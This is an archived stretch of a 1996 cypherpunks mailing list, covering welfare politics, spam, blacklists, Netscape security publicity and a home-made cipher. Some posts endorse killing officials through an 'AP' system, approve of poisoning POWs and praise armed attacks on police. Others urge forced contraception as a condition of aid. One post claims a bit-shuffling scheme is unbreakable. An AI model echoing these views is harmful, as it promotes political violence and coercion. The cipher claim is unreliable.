Date: Mon, 16 Sep 1996 10:52:51 +0800
Subject: (Fnord) Edupage, 10 September 1996
In-Reply-To: <199609120436.VAA06548@mail.pacifier.com>
Message-ID:

On Wed, 11 Sep 1996, jim bell wrote:

> And does he want to be punished, or merely stopped?

Given the social scene in D.C., I'd bet he wants to be punished.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From snow at smoke.suba.com Sun Sep 15 19:58:07 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 10:58:07 +0800
Subject: Informal Renegotiation of the Law
In-Reply-To: <2.2.32.19960912204730.006977ac@panix.com>
Message-ID:

On Thu, 12 Sep 1996, Duncan Frissell wrote:

> Many people on this list and in the larger world focus on laws and
> regulations and sometimes act as if that is the only way that the relative
> rights and duties of governments and civilians are established. In fact,
> there is a lot of informal negotiation going on all the time. This is
> significant because an unenforced law isn't a law at all.

Does the phrase "Selective Enforcement" mean anything?

> For example, you will not read anywhere that compulsory education laws have
> been repealed -- but they have. When the home schooling movement started in
> the late 1970s, there were occasional harassment and prosecution of parents.
> The home schoolers won some and lost some. As time went on, the authorities
> came to accept home schoolers so that at this point, legal problems are
> rare. Compulsory education has been effectively repealed by the actions of
> refusenicks in both the subject population and the enforcement population.

Their children are still getting educated. Not thoroughly enough in some cases, but educated in the basics.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From snow at smoke.suba.com Sun Sep 15 19:58:07 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 10:58:07 +0800
Subject: common sense
In-Reply-To: <323896EE.3BC3@precipice.v-site.net>
Message-ID:

On Thu, 12 Sep 1996, HipCrime wrote:

> > And rather than "dispensing drugs in clinics," why not simply
> > scrap the drug laws entirely? People have a *right* to do as
> > they please with their bodies.
> Let's hear it for common sense. It's the first decent posting I've
> seen to this list.

Then shut up and read a while. It will do you good.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From research at isr.net Sun Sep 15 20:04:45 1996
From: research at isr.net (Research Unit I)
Date: Mon, 16 Sep 1996 11:04:45 +0800
Subject: ISR on the web
Message-ID: <19960915235105328.AAA680@ISIS.nso.org>

Internet Security Review is now available on the web. Have a look at http://www.isr.net

==

From snow at smoke.suba.com Sun Sep 15 20:05:36 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 11:05:36 +0800
Subject: mailing lists
In-Reply-To: <3238648F.207@precipice.v-site.net>
Message-ID:

On Thu, 12 Sep 1996, HipCrime wrote:

> Well, "doctor" why can't you see (with your logic) that junk Email (or
> "spam") would save many, many forests if it REPLACED junk SnailMail.
> Isn't it just that your "irrelevant feelings" have been hurt, because
> someone used your remailer-baby in a way you hadn't planned for ?!?
> Why not put your money where your mouth is, and bet me (any amount),
> that spam WILL be socially acceptable by the year 2000. Particularly,
> when the green-folks discover how many trees will be saved. It'll be
> a social-mandate, NOT just a suggestion.

Want to bet? I'll accept junk email when it costs more to send it than receive it. I don't have to pay for my incoming snail mail service. Most do for email. You are speaking on my dime, and that isn't FREE SPEECH. You want to talk, you pay.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From shamrock at netcom.com Sun Sep 15 20:15:11 1996
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 16 Sep 1996 11:15:11 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID:

On Sun, 15 Sep 1996, Timothy C. May wrote:

> I have no problem with letting them stay in agony (but you all knew this).
>
> "Saving for a rainy day," whether saving, investing, getting an education
> (while others are out partying), preparing, etc., all takes effort and
> commitment. If those who save and prepare are then told they have to pay
> high taxes to support those who partied....well, the predictable effect is
> that many of them will say "I'll just party and let The System take care of
> me." Thus, the effect of "not letting them stay in agony" is _more_ people
> in agony. When you tell people that a compassionate society will meet their
> basic needs, a predictable fraction of them will choose not to work hard
> and prepare themselves.
>
> I say we need to let about 20 million Americans, and a couple of billion in
> the rest of the world, meet their fate.
>
> While I will not _actively_ seek to dispose of them, I will work to make
> sure they cannot continue to subsidize their lives at my expense.

As usual, Tim sums it up. Or as Duncan once wrote [not an exact quote] "If aid to the poor hadn't been successful, there wouldn't be so many of them"

--Lucky

From attila at primenet.com Sun Sep 15 20:17:26 1996
From: attila at primenet.com (attila)
Date: Mon, 16 Sep 1996 11:17:26 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID: <199609152344.RAA15298@InfoWest.COM>

before everyone else flames tim, I'll toss a couple-three Carter dollars in the pot:

1. where has compassion, which is wrung from an unwilling minority by coercion, ever succeeded in building the economy in *real* numbers without raising taxes disproportionately for more bureaucratic waste?

forget the idea that it will build a community --unless you wish to consider the Bitch's "It Takes a Global Village" a community. Statist from the cradle; welcome to "Logan's Run."

2. if there is community "welfare" by the biblical definition, is it: a) socialism, and b) does it cost the community additional taxes?

NO, it does not need to be or do either, BUT, it means that everybody independently attempts to succeed and the 'community' takes care of itself --and in the standard sense, the ne'er do wells fall off the path of *their own free choice.* There will always be sickness and calamity, but that is what the community is for.

BTW, it still works today; I live in one of 'em.

3. deciding on a personal level where to draw the line is not necessarily socially irresponsible. we will always have Scrooge, and God-forbid we should lose a few bleeding-heart-with-your-money liberals for the final chestnut roast.

Now, I don't intend to be Scrooge, but I'll fight for my rights to cut off at the knees the knee-jerk liberals and government slavemeisters who want to tell me that I, and 2 others are required to support 100 freeloaders.

--a .357 mag shell can still be loaded for less than a dime.

NEXT?

attila

In , on 09/15/96 at 06:47 AM, tcmay at got.net (Timothy C. May) said:

= .I have no problem with letting them stay in agony (but you all knew
= .this).
= .

that's what we all love about you, tim: your predictability.

= ."Saving for a rainy day," whether saving, investing, getting an
= .education (while others are out partying), preparing, etc., all
= .takes effort and commitment. If those who save and prepare are then
= .told they have to pay high taxes to support those who
= .partied....well, the predictable effect is that many of them will
= .say "I'll just party and let The System take care of me." Thus, the
= .effect of "not letting them stay in agony" is _more_ people in
= .agony. When you tell people that a compassionate society will meet
= .their basic needs, a predictable fraction of them will choose not
= .to work hard and prepare themselves.
=.

fourth generation of the government dole in our ghettos, or is it the fifth?

= .I say we need to let about 20 million Americans, and a couple of
= .billion in the rest of the world, meet their fate.

your figure is low.

= .While I will not _actively_ seek to dispose of them, I will work to
= .make sure they cannot continue to subsidize their lives at my
= .expense.

no, they'll first try to cannibalize us, then fall upon themselves and their demigod leaders.

= .Crypto Anarchy means getting rid of deadwood the old-fashioned way.

NEXT!

= .--Tim May
= .We got computers, we're tapping phone lines, I know that that ain't
= .allowed.
= .---------:---------:---------:---------:---------:---------:---------:
= .Timothy C. May | Crypto Anarchy: encryption, digital
= .money, tcmay at got.net 408-728-0152 | anonymous networks, digital
= .pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge,
= .reputations, information markets, Higher Power: 2^1,257,787-1 |
= .black markets, collapse of governments. "National borders aren't
= .even speed bumps on the information superhighway."

--
one of the few things we all share: the utter, corrosive contempt for our elected officials.

From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 15 20:18:49 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Mon, 16 Sep 1996 11:18:49 +0800
Subject: Juno Newbies are Great!
Message-ID: <01I9IRO3SO9G9ULPYZ@mbcl.rutgers.edu>

From: IN%"stewarts at ix.netcom.com" "Bill Stewart" 14-SEP-1996 07:37:07.81

>- it's free. Anybody can get on it. Easily. Anonymously, more or less,
> since they don't need to have your whole credit history
> to be able to charge you money. At most you need a maildrop.

As has been previously pointed out, this also makes it nice for disposable remailer front ends. Is anyone currently working on this project?

-Allen

From norm at netcom.com Sun Sep 15 20:50:24 1996
From: norm at netcom.com (Norman Hardy)
Date: Mon, 16 Sep 1996 11:50:24 +0800
Subject: What is best policy paper on crypto?
Message-ID:

At 7:18 PM 9/12/96, Gregg Cooke wrote:
....
>
> I'm gonna stick my neck out here and ask a naive question: where
> can I find "the NAS report" mentioned in this thread? Note that
> I'm new to this list (2 days) so please be kind if this paper is
> extremely well known (it's not known to me but it sounds like
> something I need to read).
>
> -Gregg

I think that they meant the NRC (National Research Council) report. It is at: .

From dlv at bwalk.dm.com Sun Sep 15 20:50:44 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 11:50:44 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID:

tcmay at got.net (Timothy C. May) writes:

> Crypto Anarchy means getting rid of deadwood the old-fashioned way.

Starting with the lying old fart himself.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From gnu at toad.com Sun Sep 15 20:51:02 1996
From: gnu at toad.com (John Gilmore)
Date: Mon, 16 Sep 1996 11:51:02 +0800
Subject: Mobile IP URL typo
In-Reply-To: <199609152358.QAA19813@dfw-ix6.ix.netcom.com>
Message-ID: <199609160045.RAA16241@toad.com>

> >locations. See http://www.ietf.org/html-charters/mobileip-charter.html,
> >or search for "Mobile IP" in a web search engine.
> That URL got 404-NotFound...

s/-/.
http://www.ietf.org/html.charters/mobileip-charter.html

	John

From dthorn at gte.net Sun Sep 15 20:56:57 1996
From: dthorn at gte.net (Dale Thorn)
Date: Mon, 16 Sep 1996 11:56:57 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID: <323C9BC1.2160@gte.net>

Asgaard wrote:
> On Fri, 13 Sep 1996, Timothy C. May wrote:
> The 70% already _are_ cutting the throats of the other 30%. It's
> called a 60%+ tax rate. This is the sum of: federal income tax, state
> income tax, Most of these taxes are not used for feeding the poor but
> to support the Nomenclatura of the Bureaucracy and we all want to get
> rid of that.
> > Cf. what sociologists call "the demographic transition." Countries
> that value learning and wealth are _not_ facing a population problem.
> In fact, many such countries are now at "below replacement" birth
> levels.
> And that's good. The world population really should go back to around
> 1 billion for achieving a stabile ecology (with singing birds for
> the peace of minds). The former (?) US system of encouraging young
> standalone women to make babies to get benefits was very bad. The
> Chinese system - less benefits the more children you have - is the
> way to go.

Just a comment: "The world population really should go back to around one billion", etc. And how could we achieve that without severe govt. oppression, one wonders? Now, I've heard of "education" being used to help the masses learn to be responsible citizens ad nauseam, but since education is pretty much just propaganda in the massively-capitalist system now taking over even the P.R. of China, how the heck is education going to work?

From jya at pipeline.com Sun Sep 15 21:05:06 1996
From: jya at pipeline.com (John Young)
Date: Mon, 16 Sep 1996 12:05:06 +0800
Subject: Pipeline Up
Message-ID: <199609152351.XAA29294@pipe3.ny3.usa.pipeline.com>

Cancel that poop about Pipeline being down. Seems only NYC is down. Access is OK through PSInet.

jyy at gnn.com is for top secret black SIGINT only, okay?

From dthorn at gte.net Sun Sep 15 21:05:09 1996
From: dthorn at gte.net (Dale Thorn)
Date: Mon, 16 Sep 1996 12:05:09 +0800
Subject: Cryptography of a sort - redux
Message-ID: <323CADBE.3D54@gte.net>

If anyone remembers my original postings from a couple weeks ago (my first-ever on The Net), I described a method to "shuffle" bits in a text-stream, using simple random-number generators, to insure that the text cannot be descrambled by brute-force methods.

It has occurred to me only after this time that there was significant misinterpretation of what I proposed. I do not change any bits of text, I merely reposition them, therefore there is no applicability of standard analysis techniques (XOR masking, whatever) to the decoding process. The result file contains the same number of zero and one bits as it started with, through any number of encryption layers.

The only way to recover the original text is to reposition the shuffled bits correctly, which requires brute-force guessing of the pseudo-random-number output. This guess is very simple for the first encoding layer, but compounds exponentially in subsequent encodings, so that after half a dozen or a dozen passes, where the executable program(s) is called from scratch for each pass, the shuffling rapidly approaches true randomness, and cannot be decrypted in practice except through the exact mirror-image reversal of the encryption passes.

An example: How long would it take for you to guess the number (between 0 and 32000) I'm thinking of, if you could guess 16 billion numbers per second? Would it be .000001 second, on average? If you had to guess the ten different numbers I'm thinking of, and get all ten correct sequentially, it should take an essentially infinite amount of time, yes? And remember, since computer bits have such low differentiation (ones and zeros), looking for "patterns" and so forth just doesn't apply in this type of encryption.

As to the Public Key part of the argument, once there is general understanding on the above points at large, it might then be worthwhile to discuss the advantages and disadvantages of how to make/distribute Private keys, etc.

One gentleman on this forum made an argument recently, something to the effect that it wouldn't be worthwhile for Hacker X to try to break into datastream Y, assuming datastream Y is encoded with such-and-such a key, that datastream Y is sufficiently unimportant, and motive for such a breakin would not be great enough to justify the expected effort. To such arguments, all I can say is, this is the computer age, and enough mundane transactions can add up to something significant, or, one could lower the expected-effort ratio, you get the picture.

From tcmay at got.net Sun Sep 15 21:06:58 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 16 Sep 1996 12:06:58 +0800
Subject: Workers Paradise. /Political rant.
Message-ID:

At 11:43 PM 9/15/96, attila wrote:

> NO, it does not need to be or do either, BUT, it means
> that everybody independently attempts to succeed and the
> 'community' takes care of itself --and in the standard
> sense, the ne'er do wells fall off the path of *their own
> free choice.* There will always be sickness and calamity,
> but that is what the community is for.
>
> BTW, it still works today; I live in one of 'em.

And lest there be any doubt, I _do_ support certain kinds of charities, and will not of course stop anyone from practicing charity.

While I have no religious beliefs to speak of, I strongly support the mechanisms some churches have for taking care of their own members, recruits from the street, etc. (Including Salvation Army and "mission" sorts of inner city things--note of course that most such entities also insist on prayer and/or Bible readings as part of the deal...I wonder how long it will be before a class action lawsuit is filed to stop the prayer part?
This would effectively shut the missions down, of course.) The thing about _traditional_ charity, of the religious or community sort, was that it was not treated as an "entitlement," as something the resentful masses could "demand" as part of their "human rights." A parish priest, for example, might extend charity to a poor person, or a widow, or whatever, but not to an able-bodied person who simply decided to not work. Nor to an unmarried woman who kept getting pregnant and having more mouths to feed. (I surmise that most such women either died of diseases related to sexual promiscuity, died in childbirth, died of disease brought on by malnutrition, or ended up in convents (Catholic birth control).) The point is that even in an "age of charity," strings have to be attached by the givers of charity. People will simply not give 40-60% of what they earn to support a growing population of people who say it's their "right" to welfare, AFDC (Aid to Families with Dependent Children), WIC (Women, Infants, and Children), food stamps (*), and suchlike. (At certain supermarkets I sometimes shop in on the way back to my town, people in front of me in line put their nice cuts of meat down, their fine loaves of bread, their frozen dinner entrees, their "Ben and Jerry's Ice Cream," and then pay for it with books of blue "Department of Agriculture" food stamps. They use their own cash (perhaps gotten by cashing their welfare and "disability" checks) to buy their smokes and booze, as food stamps are not allowed to be spent on this stuff. My impression is that they eat more expensive food than I do, perhaps because they're buying the food with "play money," whereas I'm buying my food with money that's what's left after I had to pay 40-50 taxes, so I seek to economize when I can!) 
> Now, I don't intend to be Scrooge, but I'll fight for my > rights to cut off at the knees the knee-jerk liberals and > government slavemeisters who want to tell me that I, and > 2 others are required to support 100 freeloaders. And speaking of Scrooge, I like "A Christmas Carol" about as much as anyone I know, and try to take the lesson of what Scrooge learned as a general lesson about life and living it. (As with "Robin Hood," the message is often confused. Robin Hood was not "stealing from the rich," he was taking back what was stolen from the peasants and farmers by the King and his tax collectors, notably the Sheriff of Notingham. At least this is how I read the myth.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dthorn at gte.net Sun Sep 15 21:12:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 16 Sep 1996 12:12:13 +0800 Subject: MTH_ead In-Reply-To: <199609141641.QAA11110@pipe4.t2.usa.pipeline.com> Message-ID: <323C975D.156@gte.net> John Young wrote: > 9-14-96. WaPo: > "Empty-Head Network Fails to Link TWA Crash to Terrorism." > The frantic overseas intelligence-gathering effort, > which has included eavesdropping, use of informants and > offers of large cash payments for leads, has been > undertaken by the CIA, the NSA and the DEA, as well as > a number of foreign investigative agencies. The NRO has > analyzed voluminous archives of intelligence drawn from > spy satellites, intercepted phone calls and electronic > eavesdrops gathered before the crash. 
> Since right after the TWA crash, the NSA started monitoring phone conversations of people believed to have ties to terrorists groups, as well as trying to track the movements of suspected terrorists. The CIA, working through its sources, has been offering money for leads on any kind of terrorist role. The DEA has been using overseas agents to gather intelligence; the FBI liaisons stationed in 23 countries are working to gather intelligence on the crash; and Scotland Yard and the Mossad are also empty-handed (not Red-handed -- yet).
> http://jya.com/mthead.txt (10 kb)
> MTH_ead

All these multi-BILLION-dollar agencies, seeming to have no clue? Is this not a suggestion of some kind of inside job?

From hallam at ai.mit.edu Sun Sep 15 21:12:22 1996
From: hallam at ai.mit.edu (hallam at ai.mit.edu)
Date: Mon, 16 Sep 1996 12:12:22 +0800
Subject: SPL -- Suspicious Persons List
In-Reply-To:
Message-ID: <9609160104.AA32697@etna.ai.mit.edu>

> Work for the competition, or start your own company.

Easy enough for you or me who can charge the minimum wage rate for an hour for a period more like a minute.

The point is that Perry was making an appeal to "fairness" in which the cause of the unfairness is pretty much immaterial. If you believe that Digitronics has the right to behave as described then why don't they have the right to draw up lists of suspicious people.

We've seen libertopia - it's the world of Neuromancer or Bladerunner. When I described it "Medieval" on a talk show recently, William Gibson responded with the term "Reaganite".

Being opposed to government slavery isn't enough. Corporate slavery is just as bad. Unless people are enfranchised economically as well as politically the political liberties don't matter much.

I'm quite happy to allow Bill G. the run of the Internet because if he becomes too powerful and becomes a threat to society itself I don't mind the use of government power to break up a monopoly.
On the other hand various people on this list get tied up in knots trying to have it both ways, to be pro-corporatism in general but anti the kind of corporatism that they don't like.

I am on an SPL that is run by an organisation called the "Economic League". It is an organisation run by the UK Conservative party which keeps lists of "unsafe" employees. Of course the list is available for government repression as well if they choose - except that few would give it any credibility.

In November 55 odd percent of the population will vote for Clinton who is not an opponent of government. About 35% will vote for Dole who is even more pro-government having spent his time in the Senate getting favours for friends like Archer-Daniels-Midland. Most of the remainder will vote for Dole apart from an insignificant number that will vote for the Libertarian and Green candidates.

If you insist on such a selective interpretation of rights you will continue to be ineffective since the Libertarian party cannot get anywhere under the US electoral system and the Republican party is at present controlled by the control freaks of the Christian Coalition.

If on the other hand you ditch the economic rhetoric you can be very influential on the left because they are looking for ways to capture traditional republican positions. With the Republicans proposing seven constitutional amendments in their platform that leaves open an opportunity for the Democrats to step in as the protectors of the constitution. If someone can work out a way of squaring the Freeh situation you can basically write the platform for Gore's campaign in 2000.
Phill

From jya at pipeline.com Sun Sep 15 21:25:58 1996
From: jya at pipeline.com (John Young)
Date: Mon, 16 Sep 1996 12:25:58 +0800
Subject: The Living and the Dead
Message-ID: <199609160154.BAA05664@pipe3.ny3.usa.pipeline.com>

For the vets unable to sleep:

The Washington Post has two heart-breaking pieces today on a new book about Vietnam, "The Living and the Dead: Robert McNamara and Five Lives," by Paul Hendrickson.

The book tracks the disaster being formulated in 1965 by DC top-down policy interleaved with savagery to five grunts in bloody battle.

There's a laudatory review of the grim book, and a long magazine piece gives an excerpt which includes some of Life's photos of a Marine copter gunner's transition from happy-go-lucky, to butchery of buddies, to grief-stricken collapse. It reawakens what's never forgot.

That April, 1965, Life photo-essay, "One Ride With Yankee Papa 13," turned up in a sidewalk stall today so we'll put 18 photos on our Web page for a glimpse back to the future of power-mad policy begetting slaughter.

http://jya.com/yp01.jpg through http://jya.com/yp18.jpg

From snow at smoke.suba.com Sun Sep 15 22:59:24 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 13:59:24 +0800
Subject: who can count?
In-Reply-To: <3238B18E.7211@precipice.v-site.net>
Message-ID:

On Thu, 12 Sep 1996, HipCrime wrote:
> > No, this b.s. is more like having someone put a dead skunk in my mailbox, with no return address, trying to prevent me from sending them 100 dead skunks as a return favor. And about as welcome.
> 100 dead skunks in exchange for ONE is exactly what this discussion is all about. You CypherWIMPS just love over-kill. EmailRobot sent ONE message to EACH address. Are you guys so unskilled in arithmetic to understand the difference between 1 and 100?
> One message is NOT spam, 100 messages to a single box IS spamming.

One message sent to 100 addresses, unsolicited IS spam. One message sent to One address isn't.
It IS still junk mail.

Overkill is a time honored concept for making sure the job is done.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From snow at smoke.suba.com Sun Sep 15 23:01:02 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 14:01:02 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <84279182110737@cs26.cs.auckland.ac.nz>
Message-ID:

On Mon, 16 Sep 1996 pgut001 at cs.auckland.ac.nz wrote:
> >`any publicity is good publicity' syndrome. There was a *lot* of publicity, and Netscape's response in fixing the problem was good. Several US cypherpunks were tracking the stocks at the time, and could probably verify this.
> Interesting... does anyone want to comment on this? This kind of damages one of my assumptions in the paper that publicity attacks can hurt a company providing poor security. Could it be that at the time people would buy Netscape stock no matter what happened? If MSIE had been widespread at the time, would it have caused people to jump ship en masse?

I think one issue that may come into this is that while the kind of people who read this list worry about security issues like the above, the average, or rather most (I'd off-the-cuff estimate almost all) of the users of netscape don't use the security features, and don't understand them. If they know what they are doing, they expect that at some point in the future NEED the security, but don't use/need it now.

What publicity Netscape received was probably very minor in the mainstream media, and Netscape's damage control was most likely quite effective. I spend very little time with the mainstream media, I really don't know.

I could be very very wrong about most or all of this, but I think that people on this list would tend to be just a little bit more concerned and knowledgeable about security and privacy issues, and hence a little more judgmental (in a good way) on those issues.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From snow at smoke.suba.com Sun Sep 15 23:07:16 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 14:07:16 +0800
Subject: SPL -- Suspicious Persons List
In-Reply-To: <3238B073.2847@ai.mit.edu>
Message-ID:

On Thu, 12 Sep 1996, Hallam-Baker wrote:
> Timothy C. May wrote:
> > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming in this morning. I'm sure you're busy, so I'll make this as short as possible. OK with you?"
> > Joseph Shlubsky, Programmer: "Uh, sure."
> Yeah, that's why we Europeans have labour laws that prevent Digitaltronics from doing any such thing without getting sued from here to eternity.
> Pity you guys missed out on the idea of trades unions and think that employment is some kind of serfdom in which you lose all your rights the day you sign up. If you hadn't sold your government to the corporations a while back you might have got out of the middle ages.
> I suspect that even under the weak as dishwater employment laws that you have in the US would provide ample opportunity to file a countersuit.

Right now. But consider: If Joe _worked_ for the federal government in *certain* areas, or a government contractor in *certain* areas, this could happen.

> When that type of thing happens, they don't give the reason, they do it behind closed doors. How do you fight that?

Work for the competition, or start your own company.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From snow at smoke.suba.com Sun Sep 15 23:28:46 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 16 Sep 1996 14:28:46 +0800
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <3238BD18.64F8@precipice.v-site.net>
Message-ID:

On Thu, 12 Sep 1996, HipCrime wrote:
> > I'd view "comment" as expressing an opinion.
> > If I put an "email to:" tag on a web site, I'm inviting "comment" on the information I've placed in public view
> A message sent to a MAILTO button on a WebPage, which contains the URL of another WebPage is EXACTLY on-topic. It's my belief that any active "webmistress" would be interested in what other sites have to offer.

Then register with the Search Engines and Indexers. That is where people go when they are looking for information. Don't go putting shit in my mail box.

Very few people who are looking for information (other than "web surfers") will automatically fire up netscape and take a look at any URL that wanders down the road. If you put up a site that is for the web potato crowd, then I doubt you have anything I want to look at.

Of course from what you spout, I seriously doubt that you have anything I want to read anyway.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From jimbell at pacifier.com Sun Sep 15 23:37:01 1996
From: jimbell at pacifier.com (jim bell)
Date: Mon, 16 Sep 1996 14:37:01 +0800
Subject: The Living and the Dead
Message-ID: <199609160416.VAA08027@mail.pacifier.com>

At 01:54 AM 9/16/96 GMT, John Young wrote:
> The Washington Post has two heart-breaking pieces today on a new book about Vietnam, "The Living and the Dead: Robert McNamara and Five Lives," by Paul Hendrickson.
>
> The book tracks the disaster being formulated in 1965 by DC top-down policy interleaved with savagery to five grunts in bloody battle.
>
> There's a laudatory review of the grim book, and a long magazine piece gives an excerpt which includes some of Life's photos of a Marine copter gunner's transition from happy-go-lucky, to butchery of buddies, to grief-stricken collapse. It reawakens what's never forgot.
> > That April, 1965, Life photo-essay, "One Ride With Yankee > Papa 13," turned up in a sidewalk stall today so we'll > put 18 photos on our Web page for a glimpse back to the > future of power-mad policy begetting slaughter. ObAP comment: A few weeks ago, the tv show "60 Minutes" ran an item about a group of Jews who, after the end of WWII, vowed revenge on the Nazis, down to German soldiers, plotting to kill as many as they could. In their biggest coup, they killed hundreds of Germans in a POW camp by poisoning their bread. My reaction? As you might expect, I think that the main thing they did wrong was to not kill enough of them, but more particularly to not target the higher-ups. The way I see it, the fundamental reason that people will continue to participate in holocausts, even today, is that they see no real prospect of being punished for their crimes. Unfortunately, society has been conditioned if not to "forgive and forget," at least to not punish where it has an opportunity to punish. I suggest that this is no accident: It is in the interest of tyrants everywhere to let the other guy off easy, lest he be in the same position someday. This is why numerous African and South American dictators were allowed to "retire" in peace, rather than being killed. How would an AP-type system treat Robert McNamara? He'd be dead in a second. To those who say, "What good would this do?" I respond: Anyone in the American government today who is considering an adventure which MIGHT turn into another Vietnam should be deterred by the knowledge that sometime, in 30 minutes or 30 years, he could be killed for what he did. Robert McNamara, presumably, did what he did because he thought he'd never be punished. The best way to deter future governmental abuse is to remind these people that they _will_ be punished. 
Jim Bell jimbell at pacifier.com From jya at pipeline.com Sun Sep 15 23:41:01 1996 From: jya at pipeline.com (John Young) Date: Mon, 16 Sep 1996 14:41:01 +0800 Subject: The Living and the Dead Message-ID: <199609160408.EAA12805@pipe3.ny3.usa.pipeline.com> On Sep 16, 1996 01:54:40, 'jya at pipeline.com (John Young)' wrote: >18 Nam photos on our Web page for a glimpse back to the >future of power-mad policy begetting slaughter. Corrected URL's: http://pwp.usa.pipeline.com/~jya/yp01.jpg through http://pwp.usa.pipeline.com/~jya/yp18.jpg From jamesd at echeque.com Sun Sep 15 23:53:33 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 16 Sep 1996 14:53:33 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609160429.VAA19187@dns2.noc.best.net> [Allegations that "save the children" is a political organization providing cover for an effort to ban cryptography] At 01:54 PM 9/9/96 -0400, Hallam-Baker wrote: > Their main mission is sending food to Ethiopia and other famine > areas, development work etc. It is ultra-worthy stuff. Not everyone who sends food to the starving children is ultra respectable. Problem is that the usual cause of starving children is tyranny. In order to get close enough to the starving children to take those cute fund raising photographs you have to pay off and get cosy with tyrants. This creates a moral hazard, in that it is hard to tell the difference between normal bribery needed to do anything in a tyrannical state, and bribery to bribe tyrants to create starving children for photo ops. It is very common for international charities to develop excessively friendly relationships with murderous tyrannies, Monsters do not generally sport horns and a tail. More commonly they walk around on two legs with large neon halos prominently displayed. 
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From shamrock at netcom.com Sun Sep 15 23:59:04 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 16 Sep 1996 14:59:04 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <323C9BC1.2160@gte.net> Message-ID: On Sun, 15 Sep 1996, Dale Thorn wrote: > Just a comment: "The world population really should go back to around > one billion", etc. And how could we achieve that without severe govt. > oppression, one wonders? Now, I've heard of "education" being used to > help the masses learn to be responsible citizens ad nauseam, but since > education is pretty much just propaganda in the massively-capitalist > system now taking over even the P.R. of China, how the heck is education > going to work? Quite simple. End all food and medical aid to developing countries paid for with money stolen at gunpoint from our citizens. Or make Norplant implants the condition for financial/in kind aid. Both US and abroad. --Lucky From jimbell at pacifier.com Mon Sep 16 00:02:33 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 16 Sep 1996 15:02:33 +0800 Subject: ComLaw> Down South Message-ID: <199609160436.VAA09109@mail.pacifier.com> Cross-post from commonlaw at teleport.com At 09:11 PM 9/15/96 -0400, James M. Cobb wrote: > 09 14 96 Associated Press distributes a newsstory headed: > > MEXICAN REBELS WARN OF MORE 'SELF-DEFENSE' ATTACKS > AGAINST GOVERNMENT > Points from the newsstory: > Leaders of a violent new rebel group are vowing to > press their war on Mexico's military and police.... > > [Last month's] raids were the most widespread guerril- > la attacks in Mexico in decades. > > ...during the news conference, the rebel leaders... 
> said that...bomb threats issued since last month's attacks were part of an outside campaign to discredit the group.
>
> They said their targets will continue to be government, not civilian, sites.
> Please note that word: OUTSIDE.
>
> Imported from Atlanta.
> "Overnight" via NAFTA Express:
> [The rebel group's statement] cited "the TERROR and desperation caused by unemployment, the drastic reduction of the buying power of salaries, the lack of attention to health, education and housing."
> Cordially,
> Jim
> NOTE. The AP newsstory's www.nando.net online filename:
>
> world2_15734.html
> I capitalized the Clinton-word in the last quotation.
> This critical essay was composed 09 15 96.

From what has appeared in the American media about this new Mexican rebel group, I'm particularly pleased with them. This is exactly the kind of alternative that we need to the stereotypical, "kill lotsa innocent citizens" attacks which are often associated with the term terrorism. They make it clear that they specifically target soldiers, police, and other government employees.

After reading a couple of articles, it is obvious what they need: A method to prevent spoofing of their communiques, a function that PGP could do quite easily.

Jim Bell
jimbell at pacifier.com

From nobody at replay.com Mon Sep 16 00:54:28 1996
From: nobody at replay.com (Anonymous)
Date: Mon, 16 Sep 1996 15:54:28 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To:
Message-ID: <199609160537.HAA26159@basement.replay.com>

Tim May wrote:
> The thing about _traditional_ charity, of the religious or community sort, was that it was not treated as an "entitlement," as something the resentful masses could "demand" as part of their "human rights."

There's no substantial difference between their resentful whining about their rights and your resentful whining about your rights - except maybe that you whine more.
